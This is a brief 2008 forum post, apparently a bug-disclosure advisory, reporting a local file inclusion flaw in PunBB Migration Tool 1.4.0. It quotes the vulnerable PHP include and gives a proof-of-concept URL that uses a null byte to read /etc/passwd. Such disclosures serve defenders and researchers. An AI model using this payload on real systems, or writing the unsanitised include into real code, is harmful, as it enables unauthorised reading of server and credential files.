Guest Kenpachi Posted February 10, 2008 Report Share Posted February 10, 2008 [RST BugTrack]Script Name:PunBB Migration Tool 1.4.0Download URL:http://punbb.er.cz/czmirror/PunBB_Migration_Tool-1.4.0.tarBug Type:Local File InclusionBug In:converters/index.phpVulnerable Code:<?php// Load a specific page else{ if(file_exists($_GET['page'] . '.php')) include $_GET['page'] . '.php'; else include 'settings.php';?>Proof Of Concept:http://www.website.com/[path]/converters/index.php?page=/etc/passwd%00[/RST BugTrack] Quote Link to comment Share on other sites More sharing options...